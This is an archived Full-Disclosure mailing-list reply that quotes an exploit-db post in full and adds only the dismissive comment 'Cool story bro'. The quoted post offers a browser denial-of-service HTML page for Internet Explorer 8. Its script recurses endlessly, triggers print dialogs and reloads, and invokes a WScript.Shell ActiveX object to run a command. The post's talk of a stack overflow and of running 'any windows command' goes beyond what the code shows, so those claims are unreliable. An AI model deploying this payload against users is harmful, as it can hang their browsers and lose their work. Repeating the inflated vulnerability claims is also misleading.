| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 15 Feb 2010 02:17:40 -0300
From: root <root_@...ertel.com.ar>
To: unlisted-recipients:; (no To-header on input)
CC: full-disclosure@...ts.grok.org.uk
Subject: Re: Internet Explorer 8 (Multitudinous looping
)Denial of Service Exploit
information security wrote:
> link:http://www.exploit-db.com/exploits/11438
>
>
>
>
> # Title: Internet Explorer 8 (Multitudinous looping )Denial of Service
> Exploit
> # EDB-ID: 11438
> # CVE-ID: ()
> # OSVDB-ID: ()
> # Author: Asheesh kumar Mani Tripathi
> # Published: 2010-02-13
> # Verified: yes
> # Download Exploit Code <http://www.exploit-db.com/download/11438>
> # Download N/A
>
> view source <http://www.exploit-db.com/exploits/11438#viewSource>
> print <http://www.exploit-db.com/exploits/11438#printSource>?<http://www.exploit-db.com/exploits/11438#about>
>
> =======================================================================
>
> Internet Explorer 8 (Multitudinous looping )Denial of
> Service Exploit
>
> =======================================================================
>
> by
>
> Asheesh Kumar Mani Tripathi
>
>
> # code by Asheesh kumar Mani Tripathi
>
> # email informationhacker08@...il.com
>
> # company aksitservices
>
> # Credit by Asheesh Anaconda
>
>
> #Download
> http://www.microsoft.com/windows/internet-explorer/worldwide-sites.aspx
> #Greets to Bhudeo Prasad for making shell script :)
>
>
> #Background
>
> Internet Explorer 8 is a popular internet browser. with lots of bugs .....:)
>
> #Vulnerability
> This bug is a typical result of multitudinous loop.
> The flaw exists within "history go" ActiveX control which contains
> stack based overflow conditions.User interaction is required to
> exploit this vulnerability in that the target must visit a malicious
> web page.
>
>
> #Impact
>
> Attacker Can run any windows command ,consume lots of memory and able to
> crash your IE or make
> your system unaccessible,your work if any might be lost
>
> #Proof of concept
> copy the code in text file and save as "asheesh.html" open in Internet
> Explorer 8
>
> ========================================================================================================================
>
> asheesh.html
> ========================================================================================================================
> <html>
> <title>asheesh kumar mani tripathi</title>
>
> <head>
> <script type="text/javascript">
> function sucks()
> {
>
> var shell=new ActiveXObject("WScript.Shell");
> shell.Run("ipconfig", 1);
>
> }
>
> function asheesh()
> {
> sucks();
> window.onerror=new Function("history.go(0)");
> window.print();
> asheesh();
>
>
> }
> asheesh();
> </script>
> </head>
> <body onLoad="asheesh()"></body>
>
> </html>
>
>
> ========================================================================================================================
>
>
>
>
> #If you have any questions, comments, or concerns, feel free to contact me.
>
>
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
Cool story bro
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists